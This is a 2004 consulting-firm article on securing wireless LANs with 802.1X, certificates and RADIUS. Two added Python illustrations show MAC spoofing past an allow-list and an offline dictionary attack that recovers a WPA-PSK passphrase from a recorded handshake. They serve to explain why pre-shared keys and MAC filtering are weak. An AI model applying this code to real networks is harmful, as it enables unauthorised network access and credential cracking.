Corporate Office
505 Sunset Court
Mt. Zion, IL  62549
ph (217) 864-2326
f (217) 864-2281

Securing Wireless LANs:
A Certificate-Based Approach to Wi-Fi Security

Laptops, Tablet PCs, PDAs, and now tower PCs come equipped with Wi-Fi as a standard component. Many organizations have tested Wi-Fi in their enterprise but have shied away from large deployments or banned its use altogether. For traveling users, Wi-Fi is a fact of life, particularly in hotels; given the choice of dial-up or high-speed, most users opt for speed. Wi-Fi now offers many productivity and technology benefits, but its poor security record has kept many organizations from deploying it. So how do you come up with an end-to-end solution that you can keep secure while letting your organization take advantage of this prolific technology? That is the focus of this article.

Main Security Threats for Wi-Fi
Since the beginning of WLANs / Wi-Fi, the security threats have been basically the same:

Threat: Eavesdropping (disclosure of data)
Eavesdropping on network transmissions can result in disclosure of confidential data and unprotected user credentials, and the potential for identity theft.

Threat: Interception and modification of transmitted data
If an attacker can gain access to the network, he or she can use a rogue computer to intercept and modify network data communicated between two legitimate parties.

Threat: Spoofing
Ready access to an internal network allows an intruder to forge apparently legitimate data in ways that would not be possible from outside the network, for example a spoofed e-mail message.

Threat: Denial of service (DoS)
A determined assailant may trigger a DoS attack in a variety of ways. For example, radio-level signal disruption can be caused by something as low-tech as a microwave oven, since it radiates in the same 2.4 GHz band.

Threat: Free-loading (or resource theft)
An intruder may want nothing more sinister than to use your network as a free point of access to the Internet. Though not as damaging as some of the other threats, free-loading will at the very least lower the available level of service for your legitimate users, and may also introduce viruses and other threats.

Threat: Accidental threats
Some features of WLANs make unintentional threats more real. A visitor's portable computer is now a potential entry point for viruses onto your network. This kind of threat is mainly a problem in unsecured WLANs, where any device in range can join.

Threat: Rogue WLANs
If your company officially has no WLAN, you may still be at risk from unmanaged WLANs springing up on your network. Low-priced WLAN hardware bought by enthusiastic employees can open unintended vulnerabilities in your network.

The Benefits of Wi-Fi
The benefits of WLAN technology can be broken down into two main categories: operational benefits and those which affect core business practices. Core business benefits include improved employee productivity, quicker and more efficient business processes, and greater potential for creating entirely new business functions. Everyone knows that improved efficiency has the potential to add profit to the bottom line.
• Mobile workers stay connected while moving between offices.
• Users are not tethered by a cable and can stay in touch wherever they are.
• Online information is always available.
• Organizational flexibility is also enhanced.
• New devices and applications are easier to integrate.

Different organizations will experience different benefits; which of these are relevant to your organization depends on many factors, such as the nature of your business and the size and geographic distribution of the workforce. The main operational benefits of Wi-Fi technology are lower capital and operational costs. This is accomplished because:
• The cost of provisioning network access to buildings is substantially lower.
• You can easily scale the network to respond to different levels of demand as the organization changes, even from day to day if required.
• Capital cost is no longer tied to building infrastructure, because you can move your wireless network infrastructure to a new building relatively easily.

A Secure Wireless Solution?
It is important that any implementation of Wi-Fi works, based on the technologies of the day. It is equally important that the solution encompasses design, planning, building, and configuration as well as ongoing monitoring, maintenance, and management, to ensure that it stays safe, productive and secure. But what are the qualifications and specifications for such a system? Is it possible to have something that works in the wireless world and remains secure enough to keep those of us in the IT world happy? Yes, thankfully, there is such a solution.

Wireless LAN Security?
Wi-Fi has struggled with weaknesses since its inception. Analysts and network security firms have been striving to resolve those weaknesses and have contributed significantly to improved wireless security. Unfortunately, Wi-Fi has still had its share of flaws. While this work progressed, the Institute of Electrical and Electronics Engineers (IEEE) and other standards organizations redefined and improved the wireless security standards to enable Wi-Fi to stand up to the hostile security environment of the early twenty-first century. These efforts have not gone unrewarded: "WLAN security" is no longer considered an oxymoron. It is now possible to deploy and use Wi-Fi with a high level of confidence in its security, as long as you do not deploy an out-of-the-box default solution.

What are the keys to this Secure Install?
The keys are truly the keys to a secure Wi-Fi deployment, at least in a small-scale implementation: pre-shared keys (PSK), that is. By using WPA with a PSK, configuring the wireless access point (WAP) to accept connections only from Wi-Fi cards with designated MAC addresses, and not broadcasting its SSID to the world, a small organization can create a Wi-Fi presence that is reasonably secure against casual intruders. Two caveats apply, though. MAC filtering and SSID hiding are obscurity measures, not authentication: the 802.11 frame header, including the station's MAC address, is never encrypted, and the SSID is sent in the clear whenever a legitimate client associates, so anyone with a wireless sniffer can read an allowed MAC address and the "hidden" network name and configure their own card to use them. The security of a PSK network therefore rests on the passphrase alone. It is possible to create a solution that uses only passwords for security, but it is unlikely to stay secure, because simple passwords can be cracked, particularly when the handshake that depends on them is traveling through the air on radio waves and can be recorded for an offline guessing attack. The third and most secure method uses certificate-based security. This requires the organization to deploy security certificates to its users and machines, which is the approach described in the rest of this article.
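To see why MAC filtering and a hidden SSID are not real protection, here is a small added illustration (editor's example, not part of the original article or the Microsoft guide it cites). It builds a few 802.11 frames with made-up addresses and the assumed network name "CorpNet", then shows what a passive sniffer can read from them: the MAC addresses in every header, including an encrypted data frame, and the SSID in the client's association request even though the beacon leaves it blank. The forged association request at the end reuses an observed MAC and passes a MAC allow-list check.

```python
import struct

# Added illustration, not code from the original article. Every frame below is
# constructed here; the MAC addresses and the SSID "CorpNet" are assumptions.

SSID_ELEMENT_ID = 0
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_ASSOC_REQ, SUBTYPE_BEACON = 0, 8
FLAG_TO_DS, FLAG_PROTECTED = 0x01, 0x40
# Fixed fields before the information elements: beacon = timestamp 8 +
# interval 2 + capability 2; association request = capability 2 + listen 2.
MGMT_FIXED_LEN = {SUBTYPE_BEACON: 12, SUBTYPE_ASSOC_REQ: 4}


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(ftype, subtype, flags, addr1, addr2, addr3, body):
    """Minimal 802.11 frame: frame control, duration, 3 addresses, seq ctrl, body."""
    fc = struct.pack("<BB", (subtype << 4) | (ftype << 2), flags)
    return fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def ssid_from_elements(elements):
    """Walk the (id, length, value) elements; '' means a 'hidden' SSID."""
    i = 0
    while i + 2 <= len(elements):
        eid, length = elements[i], elements[i + 1]
        if eid == SSID_ELEMENT_ID:
            return elements[i + 2:i + 2 + length].decode("utf-8", "replace")
        i += 2 + length
    return None


def parse_frame(frame):
    """What a passive sniffer sees: the header is never encrypted, even when
    the Protected Frame bit says the body is."""
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    info = {"type": ftype, "subtype": subtype,
            "protected": bool(fc1 & FLAG_PROTECTED),
            "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
            "addr3": mac_str(frame[16:22]), "ssid": None}
    if ftype == TYPE_MGMT and subtype in MGMT_FIXED_LEN:
        info["ssid"] = ssid_from_elements(frame[24 + MGMT_FIXED_LEN[subtype]:])
    return info


# Constructed sample capture: an AP with SSID broadcast off and one allowed client.
AP = bytes.fromhex("00aa11bb22cc")
CLIENT = bytes.fromhex("00dd33ee44ff")
BROADCAST = b"\xff" * 6
SSID = b"CorpNet"

# Beacon carries an empty SSID element (the 'hidden' network).
beacon = build_frame(TYPE_MGMT, SUBTYPE_BEACON, 0, BROADCAST, AP, AP,
                     struct.pack("<QHH", 0, 100, 0x0411) + bytes([SSID_ELEMENT_ID, 0]))
# The legitimate client must name the network in its association request.
assoc_req = build_frame(TYPE_MGMT, SUBTYPE_ASSOC_REQ, 0, AP, CLIENT, AP,
                        struct.pack("<HH", 0x0411, 10) + bytes([SSID_ELEMENT_ID, len(SSID)]) + SSID)
# Encrypted data frame: body is ciphertext, addresses are not.
data = build_frame(TYPE_DATA, 0, FLAG_TO_DS | FLAG_PROTECTED, AP, CLIENT, AP,
                   bytes.fromhex("9f3c7a1d44e2b0"))
SAMPLE_CAPTURE = [beacon, assoc_req, data]


def sniffer_view(frames):
    """Every MAC seen in a header and every non-empty SSID seen in management frames."""
    macs, ssids = set(), set()
    for f in frames:
        p = parse_frame(f)
        macs.update({p["addr1"], p["addr2"], p["addr3"]})
        if p["ssid"]:
            ssids.add(p["ssid"])
    macs.discard(mac_str(BROADCAST))
    return macs, ssids


def mac_filter_accepts(allowed_macs, frame):
    """A MAC allow-list only checks the unauthenticated transmitter address."""
    return parse_frame(frame)["addr2"] in allowed_macs


def spoofed_association(frames):
    """Attacker reuses a client MAC and the SSID observed in the capture."""
    macs, ssids = sniffer_view(frames)
    stolen = bytes.fromhex(next(m for m in macs if m != mac_str(AP)).replace(":", ""))
    ssid = next(iter(ssids)).encode()
    return build_frame(TYPE_MGMT, SUBTYPE_ASSOC_REQ, 0, AP, stolen, AP,
                       struct.pack("<HH", 0x0411, 10) + bytes([SSID_ELEMENT_ID, len(ssid)]) + ssid)


if __name__ == "__main__":
    macs, ssids = sniffer_view(SAMPLE_CAPTURE)
    print("MACs in the clear:", sorted(macs), "SSIDs in the clear:", sorted(ssids))
    print("MAC filter accepts forged frame:",
          mac_filter_accepts({mac_str(CLIENT)}, spoofed_association(SAMPLE_CAPTURE)))
```

Run it and the filter accepts the forged frame; the only thing that actually stops the attacker from joining is the WPA key exchange that follows association, which is why the passphrase (or, better, a certificate) carries all the weight.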

Why Is 802.1X So Much Better at Security?
All of the improvements designed by analysts and the standards organizations have gone into this implementation. The end result is that the system deals with many of the items that were such security threats in the early implementations of Wi-Fi:

Threat: Eavesdropping (disclosure of data)
Mitigation: Encryption keys are assigned dynamically, are unique to each user session, and are changed at frequent intervals, so as long as the key refresh is sufficiently frequent, recovering the keys and reading the data is not practical by any currently known means. WPA goes further: TKIP mixes a fresh per-packet key from the session key for every frame it sends, and the group key protecting broadcast and multicast traffic is also rekeyed periodically rather than left static.

Threat: Interception and modification of transmitted data
Mitigation: Enforcing data integrity and strong data encryption between the wireless client and the wireless AP ensures that it is infeasible for a malicious user to intercept and modify data in transit. Mutual authentication between the client and the RADIUS server (by certificates) and between the wireless AP and the RADIUS server (by a shared secret) makes it difficult for an attacker to impersonate any of them.

Threat: Spoofing
Mitigation: Secure authentication to the network prevents unauthorized individuals from connecting to the network and introducing spoofed data from the inside.

Threat: DoS
Mitigation: Data flooding and other DoS attacks at the network level are prevented by controlling access to the WLAN with the 802.1X protocol. There is no defense against low-level 802.11 DoS attacks (forged deauthentication or disassociation frames, for example) in either dynamic WEP or WPA, and 802.11i does not protect management frames either; that gap was left to a later amendment, 802.11w. No standard is immune to physical-layer (radio-level) disruption. These vulnerabilities are a feature of current 802.11 WLANs and common to every option discussed in this article.

Threat: Free-loading (resource theft)
Mitigation: Unauthorized use of the network is prevented by the requirement for strong authentication.

Threat: Accidental threats
Mitigation: Accidental connection to the WLAN is prevented by the requirement for secure authentication.

Threat: Rogue WLANs
Mitigation: Although the solution does nothing directly to deal with rogue wireless APs, implementing a secure wireless solution such as this largely takes away the motivation for setting up unofficial WLANs. You should still scan periodically for access points you did not install.
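The "unique to each user session" point above, and the earlier warning that pre-shared keys can be cracked from traffic recorded off the air, can both be made concrete with an added example (editor's code, not from the original article or the Microsoft guide). It implements the 802.11i key derivation with Python's standard library: PBKDF2 turns a passphrase and SSID into the PMK, the PRF expands the PMK and the two handshake nonces into the session's PTK, and the KCK signs the EAPOL-Key message. Because a PSK-derived PMK depends only on the passphrase and SSID, whoever records one handshake (addresses, nonces and MIC) can try passphrases offline, as recover_passphrase does over a constructed word list. With 802.1X/EAP-TLS the PMK is instead exported from the TLS handshake, so a listener has no passphrase to guess. The addresses, nonces, EAPOL body, passphrase and word list are all constructed for this example.

```python
import hashlib
import hmac

# Added illustration, not code from the original article. All inputs below are
# constructed; the passphrase "sunset505" and the word list are assumptions.

PTK_LEN_CCMP = 48  # KCK (16) + KEK (16) + TK (16) for AES-CCMP


def psk_to_pmk(passphrase, ssid):
    """WPA-PSK: the Pairwise Master Key is PBKDF2-HMAC-SHA1 over passphrase and
    SSID only, so it is identical for every session and can be recomputed
    offline from a guess. With 802.1X/EAP-TLS the PMK comes out of the TLS
    handshake instead, and an eavesdropper has nothing to guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce, nbytes=PTK_LEN_CCMP):
    """Pairwise Transient Key from the 4-way handshake inputs. The two fresh
    nonces make the PTK unique to this session even though the PMK is fixed."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck, eapol_frame):
    """Key MIC for WPA2/CCMP: HMAC-SHA1 under the KCK, truncated to 16 bytes,
    over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake capture: everything a passive listener can record.
SSID = "CorpNet"
AA = bytes.fromhex("00aa11bb22cc")   # authenticator (AP) address
SPA = bytes.fromhex("00dd33ee44ff")  # supplicant (client) address
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
EAPOL_MSG2 = bytes.fromhex("0103005f02010a00") + b"\x00" * 16  # stand-in body, MIC zeroed
REAL_PASSPHRASE = "sunset505"


def handshake_mic(passphrase):
    """MIC the client would place on message 2 for a given passphrase."""
    ptk = derive_ptk(psk_to_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2)


CAPTURED_MIC = handshake_mic(REAL_PASSPHRASE)


def recover_passphrase(candidates, captured_mic=CAPTURED_MIC):
    """Offline dictionary attack: no further contact with the network is
    needed, only the recorded addresses, nonces and MIC."""
    for guess in candidates:
        if hmac.compare_digest(handshake_mic(guess), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    pmk = psk_to_pmk(REAL_PASSPHRASE, SSID)
    print("PTK:", derive_ptk(pmk, AA, SPA, ANONCE, SNONCE).hex())
    print("recovered:", recover_passphrase(["password", "corpnet", "sunset505", "welcome1"]))
```

Each guess costs 4096 HMAC-SHA1 iterations, which slows a dictionary run but does not stop it; a short or common passphrase falls quickly, and rekeying the session does not help because the PMK never changes until the passphrase does.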


Increased Investment in the Network
To have a secured installation, you need a RADIUS (Remote Authentication Dial-In User Service) infrastructure and a public key infrastructure (PKI). This is a flexible design and is suited to organizations of several hundred to many thousands of wireless network users. The RADIUS and PKI components were intentionally designed to be reusable in other network applications. This means that with a single implementation you have the tools in place for the authentication required by remote access VPNs and other security applications, such as the Encrypting File System. The Microsoft reference solution this article follows requires secure clients and secure servers: Microsoft Windows XP clients and Microsoft Windows Server 2003 servers, including Active Directory directory service domain controllers. The RADIUS server's own certificate matters as much as the clients': the client must be configured to validate it against the organization's CA, otherwise a rogue access point backed by an attacker's RADIUS server could pass itself off as the corporate network.

Where Can I Find Out More?
There are many sites on the web that give very good information on securing Wi-Fi, but one of the best is at Microsoft. They have put together a series of documents that can be used as a guide or 'cookbook' for creating a secure wireless environment. Much of the information referenced in this article came from the documents at that site. They are very thorough and have been tested and verified to work, unlike much of the theoretical material you can find on the web. The guide is titled Securing Wireless LANs with Certificate Services and can be viewed at http://www.microsoft.com/downloads/details.aspx?FamilyId=CDB639B3-010B-47E7-B234-A27CDA291DAD&displaylang=en . Many other sites, with many different opinions, can be found by using your favorite search engine and searching for 'Wi-Fi security'. If you have questions or comments about this article, contact me (JohnBoline@hagerman.com).


All product names / logos, company names / logos are copyrights of their respective holders. John Boline is an MCSE, CNE, USE and a member of the Network Professional Association. The content herein is often based on late-breaking events. Much of the material is based on information from sources that are believed to be reliable. Hagerman & Company, Inc. disclaims all warranties as to the ultimate accuracy or completeness of the information. Hagerman & Company, Inc. and its employees shall have no liability for errors, omissions or inadequacies in the information contained within this article or for any interpretations thereof. The recommendations, positions and best practice policies outlined herein represent Hagerman & Company, Inc. initial analysis and therefore are subject to change as further information which may have bearing on these positions is made available. The reader assumes sole responsibility for the selection of these materials to achieve its intended results. The opinions expressed herein are subject to change without notice. Entire contents © 2004 Hagerman & Company, Inc. All rights reserved. Reproduction of this publication in any form without prior written permission is forbidden.
by John Boline
Service Manager, MCSE, CNE, USE



Copyright © 2006 Hagerman & Company, Inc.